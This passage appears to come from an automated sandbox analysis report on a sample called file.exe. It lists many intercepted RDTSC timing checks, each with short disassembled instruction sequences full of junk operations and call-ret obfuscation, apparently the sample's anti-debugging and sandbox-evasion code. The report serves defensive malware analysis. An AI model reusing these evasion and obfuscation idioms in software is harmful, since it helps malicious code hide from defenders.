                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70ED1 second address: A70F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D233Bh], esi 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FDF30F40A58h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 movsx ecx, bx 0x0000002b mov esi, 54580EAAh 0x00000030 mov dword ptr [ebp+122D1A97h], eax 0x00000036 call 00007FDF30F40A59h 0x0000003b pushad 0x0000003c push edi 0x0000003d jo 00007FDF30F40A56h 0x00000043 pop edi 0x00000044 jmp 00007FDF30F40A5Dh 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edi 0x0000004e jl 00007FDF30F40A56h 0x00000054 pop edi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F36 second address: A70F3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F3B second address: A70F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F4B second address: A70F6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FDF30D0E2FDh 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jl 00007FDF30D0E2F6h 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71048 second address: A7104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7104C second address: A7105A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A710EA second address: A71102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007FDF30F40A5Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71102 second address: A71108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71108 second address: A71139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, 6F07C50Eh 0x0000000c push 00000000h 0x0000000e jmp 00007FDF30F40A5Dh 0x00000013 push EAB50ECFh 0x00000018 pushad 0x00000019 jbe 00007FDF30F40A5Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71139 second address: A7113D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7113D second address: A711B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 154AF1B1h 0x0000000e call 00007FDF30F40A67h 0x00000013 jmp 00007FDF30F40A5Ah 0x00000018 pop esi 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+122D190Fh], edi 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FDF30F40A58h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d sub dword ptr [ebp+122D291Bh], edi 0x00000043 push 00000003h 0x00000045 mov si, cx 0x00000048 call 00007FDF30F40A59h 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push edi 0x00000051 pop edi 0x00000052 push edx 0x00000053 pop edx 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711B3 second address: A711CE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDF30D0E2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FDF30D0E2F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711CE second address: A711D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711D4 second address: A711EE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30D0E2F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jnc 00007FDF30D0E2F6h 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711EE second address: A71265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007FDF30F40A5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FDF30F40A66h 0x0000001f pop eax 0x00000020 mov edx, 48B9AB3Eh 0x00000025 lea ebx, dword ptr [ebp+12452B5Eh] 0x0000002b jmp 00007FDF30F40A66h 0x00000030 xchg eax, ebx 0x00000031 push ebx 0x00000032 jl 00007FDF30F40A61h 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d js 00007FDF30F40A56h 0x00000043 jnc 00007FDF30F40A56h 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71265 second address: A7126B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912AA second address: A912C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30F40A5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FDF30F40A56h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912C2 second address: A912CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912CA second address: A912D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FDF30F40A56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912D6 second address: A912EB instructions: 0x00000000 rdtsc 0x00000002 je 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FDF30D0E2F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F315 second address: A8F31A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F49D second address: A8F4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F641 second address: A8F649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F649 second address: A8F64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F64F second address: A8F675 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FDF30F40A71h 0x0000000f jmp 00007FDF30F40A65h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F675 second address: A8F679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F679 second address: A8F67E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7BE second address: A8F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDF30D0E2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7C8 second address: A8F7DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7DD second address: A8F7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F949 second address: A8F94D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F94D second address: A8F953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8FDD4 second address: A8FDE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDF30F40A56h 0x00000008 jo 00007FDF30F40A56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8FDE8 second address: A8FDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87F1B second address: A87F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jc 00007FDF30F40A58h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87F31 second address: A87F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FDF30D0E308h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9049F second address: A904C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FDF30F40A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDF30F40A68h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A904C5 second address: A904C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A904C9 second address: A904E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FDF30F40A61h 0x0000000e jmp 00007FDF30F40A5Bh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90E4F second address: A90E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDF30D0E2F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90E5B second address: A90E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A910F5 second address: A9110F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93620 second address: A93624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93624 second address: A9362E instructions: 0x00000000 rdtsc 0x00000002 js 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9362E second address: A93633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55F8F second address: A55F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDF30D0E2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98DE9 second address: A98DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98DED second address: A98E49 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDF30D0E30Eh 0x00000008 jmp 00007FDF30D0E308h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FDF30D0E308h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a jmp 00007FDF30D0E305h 0x0000001f pop edi 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98E49 second address: A98E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A977A8 second address: A977AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A977AC second address: A977CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDF30F40A5Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FDF30F40A5Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A977CD second address: A977D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97ED1 second address: A97EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D9AD second address: A9D9B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30D0E2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E0C2 second address: A9E0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E0C8 second address: A9E0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E214 second address: A9E219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E219 second address: A9E221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F72D second address: A9F732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F732 second address: A9F746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDF30D0E2F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F746 second address: A9F74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F74A second address: A9F750 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F9A7 second address: A9F9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FDF30F40A56h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF2E second address: A9FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF38 second address: A9FFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jns 00007FDF30F40A6Dh 0x00000013 pop esi 0x00000014 xchg eax, ebx 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDF30F40A58h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f jmp 00007FDF30F40A5Ch 0x00000034 nop 0x00000035 push eax 0x00000036 jmp 00007FDF30F40A61h 0x0000003b pop eax 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007FDF30F40A62h 0x00000044 jne 00007FDF30F40A56h 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d jnl 00007FDF30F40A56h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FFD5 second address: A9FFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0127 second address: AA0136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA035F second address: AA0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDF30D0E2FEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0510 second address: AA0516 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA130D second address: AA1363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FDF30D0E304h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDF30D0E2FAh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FDF30D0E2F8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+1244C40Dh], eax 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1363 second address: AA136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA136A second address: AA1392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDF30D0E304h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDF30D0E2FBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1392 second address: AA139C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDF30F40A5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3B1B second address: AA3B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA676E second address: AA6774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6417 second address: AA641C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA641C second address: AA642F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDF30F40A5Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7165 second address: AA7169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABC02 second address: AABC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAADF6 second address: AAADFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACC07 second address: AACC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACC0D second address: AACC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACCE0 second address: AACCFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACCFD second address: AACD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACD03 second address: AACD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADD92 second address: AADDFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDF30D0E2F8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007FDF30D0E2F8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D2915h], eax 0x00000046 push 00000000h 0x00000048 movsx edi, bx 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d jg 00007FDF30D0E2F8h 0x00000053 pushad 0x00000054 push eax 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
